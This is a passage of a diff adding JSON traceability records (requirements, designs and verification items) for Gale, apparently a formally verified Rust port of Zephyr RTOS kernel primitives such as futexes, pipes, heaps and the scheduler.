+      "title": "Zephyr: Queue",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Verus specifications in src/mem_slab.rs with requires/ensures clauses that formally verify mem_slab properties (MS01-MS08) via SMT solving. Proves block allocation counter safety, bounds checking, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-MS-001",
+      "links": [
+        {
+          "target": "SWREQ-MS-MS01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MS-MS08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "MemSlab Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Fast userspace mutex model with wait/wake operations. Owns a WaitQueue for blocked threads. Models the val comparison for wait and the woken-count arithmetic for wake. Actual thread blocking and atomic value management stays in C — Gale verifies state machine and counter safety only. No unsafe code.\n",
+      "id": "SWARCH-FX-001",
+      "links": [
+        {
+          "target": "SWREQ-FX-FX01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FX-FX03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FX-FX04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-FX-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "architecture"
+      ],
+      "title": "Futex module (gale::futex)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Verus specifications in src/fifo.rs with requires/ensures clauses that formally verify FIFO properties (FI01-FI06) via SMT solving. Proves put/get ordering, count tracking, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-FI-001",
+      "links": [
+        {
+          "target": "SWREQ-FI-FI01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FI-FI02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FI-FI03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FI-FI04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FI-FI05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FI-FI06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "FIFO Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/futex.rs with requires/ensures clauses that formally verify futex properties (FX01-FX06) via SMT solving. Proves wait/wake semantics, val-match correctness, woken count accuracy, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-FX-001",
+      "links": [
+        {
+          "target": "SWREQ-FX-FX01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FX-FX02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FX-FX03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FX-FX04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FX-FX05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-FX-FX06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Futex Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unit tests in src/mem_domain.rs covering init, add_partition (valid, overlap, overflow, full), remove_partition, contains_addr, partition_get, and has_free_slot.\n",
+      "id": "UV-MD-001",
+      "links": [
+        {
+          "target": "SWDD-MD-ADD",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "MemDomain unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all fault_decode code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-FD-003",
+      "links": [
+        {
+          "target": "SWREQ-FD-FH01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "FaultDecode Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When alloc is called and num_used < num_blocks, num_used increments by 1 and returns OK.\n",
+      "id": "SWREQ-MS-MS04",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MS-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "MS4: alloc increments num_used by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "A valid stack pointer is never in the guard region. Guard region and usable region partition the stack.\n",
+      "id": "SWREQ-SKS-SK04",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "guard",
+        "asil-d"
+      ],
+      "title": "SK_S4: guard region doesn't overlap usable stack",
+      "type": "sw-req"
+    },
+    {
+      "description": "Close sets flags to 0, meaning the pipe is neither open nor resetting. Maps to pipe.c:287-296.\n",
+      "id": "SWREQ-PP-PP08",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "close",
+        "asil-d"
+      ],
+      "title": "PP8: close clears all flags",
+      "type": "sw-req"
+    },
+    {
+      "description": "Develop a tool or preprocessor that mechanically strips Verus annotations from src/*.rs to produce plain/*.rs, eliminating manual mirror maintenance.\nThe tool should: - Remove verus! {} macro wrappers - Strip requires/ensures/invariant/decreases clauses - Remove proof fn blocks and spec fn blocks - Remove ghost/tracked parameters - Preserve all executable code unchanged - Produce compilable plain Rust output\nThis eliminates the sync-divergence risk between Verus and plain code, which is currently the weakest link in the verification chain. TRACTOR's ForCLift work on formal code transformation could inform the design of this tool.\n",
+      "id": "REQ-TRACTOR-002",
+      "links": [
+        {
+          "target": "SYSREQ-TRACTOR-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "FIND-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "tooling",
+        "automation",
+        "mirror",
+        "verus"
+      ],
+      "title": "Automated plain/ mirror generation from Verus source",
+      "type": "sw-req"
+    },
+    {
+      "description": "If count > 0: decrement count, return OK. Otherwise return EBUSY.\n",
+      "id": "SWDD-SK-POP",
+      "links": [
+        {
+          "target": "SWARCH-SK-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SK-SK03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SK-SK07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SK-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "pop"
+      ],
+      "title": "Stack::pop — z_impl_k_stack_pop port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Return true if thread has strictly higher priority than current, or if preempt_ok is set. Meta-IRQ threads always preempt. Cooperative threads are not preempted unless by meta-IRQ.\n",
+      "id": "SWDD-SC-SHOULD-PREEMPT",
+      "links": [
+        {
+          "target": "SWARCH-SC-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SC-SC05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC14",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC15",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SC-SC16",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SC-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "preemption"
+      ],
+      "title": "Scheduler::should_preempt — should_preempt port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Both add_partition and remove_partition preserve the domain invariant including the non-overlap property.\n",
+      "id": "SWREQ-MD-MD05",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MD5: add/remove preserve non-overlap invariant",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a blocking get operation on a LIFO, with a configurable timeout period allowing threads to wait until an item is available.\n",
+      "id": "ZEP-SRS-LI-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-LI",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-LI-LI03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-LI-LI04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "lifo"
+      ],
+      "title": "Zephyr: LIFO Blocking Get With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "If full: return EAGAIN. Else: record tail slot, advance tail with wrap, increment size. C source: lib/utils/ring_buffer.c lines 53-76.\n",
+      "id": "SWDD-RB-PUT",
+      "links": [
+        {
+          "target": "SWARCH-RB-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-RB-RB03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-RB-RB05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-RB-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "put"
+      ],
+      "title": "RingBuf::put — ring_buf_put port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Unit tests in plain/src/sem.rs and plain/src/wait_queue.rs. Covers init validation, give increment/saturate/wake, try_take available/unavailable, take_blocking, reset, give-take roundtrip, invariant preservation, priority ordering.\n",
+      "id": "UV-SEM-001",
+      "links": [
+        {
+          "target": "SWDD-SEM-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-GIVE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TRY-TAKE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TAKE-BLOCKING",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-RESET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-WQ-PEND",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Semaphore unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When try_lock is called by a thread other than the owner, it returns WouldBlock without modifying the mutex state. Maps to z_impl_k_mutex_lock line 148 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M05",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "lock",
+        "contention",
+        "asil-d"
+      ],
+      "title": "M5: try_lock by different thread returns WouldBlock",
+      "type": "sw-req"
+    },
+    {
+      "description": "While the semaphore's count is zero, the requesting thread shall be blocked until the semaphore is released by another thread.\n",
+      "id": "ZEP-SRS-5-8",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisition with zero count",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism to cancel a pending or delayed work item, preventing its execution if it has not yet started running.\n",
+      "id": "ZEP-SRS-WK-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-WK",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "work"
+      ],
+      "title": "Zephyr: Work Item Cancellation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all fatal code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-FT-003",
+      "links": [
+        {
+          "target": "SWREQ-FT-FT01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Fatal Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "k_heap_alloc attempts allocation; if it fails and timeout is not K_NO_WAIT, the thread pends on the wait queue and retries upon wake. Returns NULL on timeout. Maps to kheap.c:79-129.\n",
+      "id": "SWREQ-KH-KH02",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-KH-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "alloc",
+        "blocking",
+        "asil-d"
+      ],
+      "title": "KH2: alloc blocks until memory available or timeout",
+      "type": "sw-req"
+    },
+    {
+      "description": "Kiln's host function registry accepts Gale kernel objects and exposes them to WASM components as importable functions.  Host functions are registered at runtime initialization and map directly to Gale's Rust methods without serialization or ABI translation beyond the WASM canonical ABI.\n",
+      "id": "SWREQ-KILN-002",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "kiln",
+        "host-functions",
+        "registration"
+      ],
+      "title": "Kiln host function registration for Gale primitives",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in src/fatal.rs covering from_code (valid/invalid), classify (all reason/context/mode combinations), is_panic, is_isr, reason_str, and recovery action correctness.\n",
+      "id": "UV-FT-001",
+      "links": [
+        {
+          "target": "SWDD-FT-CLASSIFY",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Fatal unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The FORCED bit in HFSR indicates that a configurable fault was escalated to HardFault. FORCED always classifies as HardFault.\n",
+      "id": "SWREQ-FD-FH03",
+      "links": [
+        {
+          "target": "SYSREQ-FD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "escalation",
+        "asil-d"
+      ],
+      "title": "FH3: HardFault FORCED bit indicates escalated fault",
+      "type": "sw-req"
+    },
+    {
+      "description": "k_heap_calloc uses size_mul_overflow to check num * size before allocating. Returns NULL if the multiplication would overflow. The allocated memory is zeroed. Maps to kheap.c:157-174.\n",
+      "id": "SWREQ-KH-KH04",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "calloc",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "KH4: calloc guards against size_t multiplication overflow",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS message queue shall deliver messages in FIFO order, where the first message enqueued is the first message dequeued.\n",
+      "id": "ZEP-SRS-MQ-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MQ",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MQ-MQ04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "msgq"
+      ],
+      "title": "Zephyr: Message Queue FIFO Ordering",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A futex that matches the Zephyr k_futex API semantics: wait (block only when val == expected) and wake (resume waiters). Must maintain wait queue integrity and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-FX-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-FX",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "kernel"
+      ],
+      "title": "Fast userspace mutex with wait/wake",
+      "type": "system-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide close and reset operations on a pipe that transition the pipe through defined states (open, closed, resetting), waking blocked threads with appropriate error codes.\n",
+      "id": "ZEP-SRS-PP-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-PP",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-PP-PP07",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PP-PP08",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PP-PP09",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "pipe"
+      ],
+      "title": "Zephyr: Pipe Close/Reset State Machine",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Check if a transmit message matches a receive message. Match requires: (tx_target == K_ANY || tx_target == rx_receiver) AND (rx_source == K_ANY || rx_source == tx_sender).\n",
+      "id": "SWDD-MB-MATCH-CHECK",
+      "links": [
+        {
+          "target": "SWARCH-MB-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MB-MB03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MB-MB05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MB-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "match"
+      ],
+      "title": "Mbox::match_check — mbox_message_match port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "ARM Cortex-M fault register decode model with classify/mmfar_checked/ bfar_checked/is_escalated and individual bit checks. Exhaustive CFSR/HFSR decode. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-FD-001",
+      "links": [
+        {
+          "target": "SWREQ-FD-FH01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FD-FH02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-FD-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "architecture"
+      ],
+      "title": "Fault decode module (gale::fault_decode)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Unit tests in plain/src/poll.rs covering event init NOT_READY state, set_ready transition, signal raise/reset/check, state machine validity, and signal flag consistency.\n",
+      "id": "UV-PL-001",
+      "links": [
+        {
+          "target": "SWDD-PL-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PL-SET-READY",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PL-CHECK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PL-SIGNAL",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Poll unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When get is called and count == 0, returns ENOENT without modifying the queue state. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-QU-QU05",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-QU-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "get",
+        "error",
+        "asil-d"
+      ],
+      "title": "QU5: get when empty returns ENOENT, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "When the last release brings nest_count to 0, the lock becomes fully unlocked (owner = None).\n",
+      "id": "SWREQ-SL-SL04",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "release",
+        "asil-d"
+      ],
+      "title": "SL4: fully released when nest_count reaches 0",
+      "type": "sw-req"
+    },
+    {
+      "description": "Every API that can block a thread (semaphore take, mutex lock, condvar wait, message queue receive) must accept an optional timeout parameter and return -EAGAIN if the deadline expires, guaranteeing forward progress.  Enforced by SWREQ-TO-TO01/TO02 and proven by FV-TO-001 (Verus).\n",
+      "id": "SC-4",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "prevents"
+        },
+        {
+          "target": "SWREQ-TO-TO01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO02",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "timeout",
+        "deadlock-prevention"
+      ],
+      "title": "All blocking primitives must support timeout",
+      "type": "system-constraint"
+    },
+    {
+      "description": "When write_check is called on a pipe that is not open, returns -EPIPE without modifying state. Maps to pipe.c:147-218.\n",
+      "id": "SWREQ-PP-PP03",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "write",
+        "error",
+        "asil-d"
+      ],
+      "title": "PP3: write_check on closed pipe returns EPIPE",
+      "type": "sw-req"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all stack code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-SK-003",
+      "links": [
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Stack Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When put is called and the queue is full, returns -ENOMSG without modifying the queue state. Maps to msg_q.c:130-228.\n",
+      "id": "SWREQ-MQ-MQ06",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "put",
+        "error",
+        "asil-d"
+      ],
+      "title": "MQ6: put on full queue returns ENOMSG, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "An event object that matches the Zephyr k_event API semantics: post (OR bits), set (replace), clear (AND complement), set_masked (selective update), wait_any (any bit match), and wait_all (all bits match).  Must maintain valid bitmask and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-EV-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-EV",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "kernel"
+      ],
+      "title": "Event bitmask with post/set/clear/wait_any/wait_all",
+      "type": "system-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's ring buffer. Contains ring_buf_init, ring_buf_put, ring_buf_get, ring_buf_peek, ring_buf_reset, ring_buf_size_get, ring_buf_space_get. The Gale port models byte-level index arithmetic only — actual buffer memory stays in C.\n",
+      "id": "PROV-RB-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "ring-buf",
+        "lib"
+      ],
+      "title": "Zephyr lib/utils/ring_buffer.c — ring buffer implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "If val != expected: return EAGAIN. Otherwise add calling thread to wait queue and block.\n",
+      "id": "SWDD-FX-WAIT",
+      "links": [
+        {
+          "target": "SWARCH-FX-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FX-FX01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FX-FX02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-FX-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wait"
+      ],
+      "title": "Futex::wait — z_impl_k_futex_wait port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Full pipe test suite run under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads.\n",
+      "id": "UV-PP-004",
+      "links": [
+        {
+          "target": "SWDD-PP-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-WRITE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-READ",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-CLOSE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "Pipe Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Write operations to the storage subsystem shall have deterministic worst-case execution time (WCET) that can be bounded at design time. This is required for ASIL-D real-time automotive systems where unbounded latency during a write could violate timing constraints and compromise safety functions.\n",
+      "id": "STKH-ZMS-002",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "wcet",
+        "deterministic",
+        "storage"
+      ],
+      "title": "Deterministic write latency (bounded WCET)",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When wake is called with wake_all=false, at most one thread is removed from the wait queue. Maps to futex.c:41-48.\n",
+      "id": "SWREQ-FX-FX04",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FX-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wake",
+        "asil-d"
+      ],
+      "title": "FX4: wake_all=false wakes at most one thread",
+      "type": "sw-req"
+    },
+    {
+      "description": "The system shall implement a priority-based preemptive scheduler with run queue management and cooperative thread support.\n",
+      "id": "ZEP-SYRS-SC",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "sched"
+      ],
+      "title": "Zephyr: Priority Scheduler",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Thread states (READY, RUNNING, SUSPENDED, PENDING, HALTED) follow valid transitions. Invalid transitions are rejected.\n",
+      "id": "SWREQ-SC-SC10",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "fsm",
+        "asil-d"
+      ],
+      "title": "SC10: thread state machine transitions are valid",
+      "type": "sw-req"
+    },
+    {
+      "description": "Pop an item from the head. If count > 0: decrement count, return OK. Otherwise return ENOENT.\n",
+      "id": "SWDD-LI-GET",
+      "links": [
+        {
+          "target": "SWARCH-LI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-LI-LI03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-LI-LI04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-LI-LI06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "get"
+      ],
+      "title": "Lifo::get — k_lifo_get port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests exercising put-get roundtrips, fill-drain cycles, and multi-byte operations.\n",
+      "id": "IV-RB-001",
+      "links": [
+        {
+          "target": "SWARCH-RB-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "RingBuf integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Read the signaled flag and result value as a consistent pair.\n",
+      "id": "SWDD-PL-CHECK",
+      "links": [
+        {
+          "target": "SWARCH-PL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PL-PL02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PL-PL06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "signal",
+        "check"
+      ],
+      "title": "PollSignal::check — z_impl_k_poll_signal_check port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The system shall implement fatal error classification and recovery decision logic for safe system shutdown.\n",
+      "id": "ZEP-SYRS-FT",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fatal"
+      ],
+      "title": "Zephyr: Fatal Error Handling",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A kernel heap allocator that matches the Zephyr k_heap semantics: init, alloc/aligned_alloc with blocking wait, calloc with overflow-safe size computation, realloc with blocking retry, and free with unpend-all wake. Must maintain heap consistency invariants and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-KH-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-KH",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "kernel"
+      ],
+      "title": "Kernel heap allocator with blocking wait",
+      "type": "system-req"
+    },
+    {
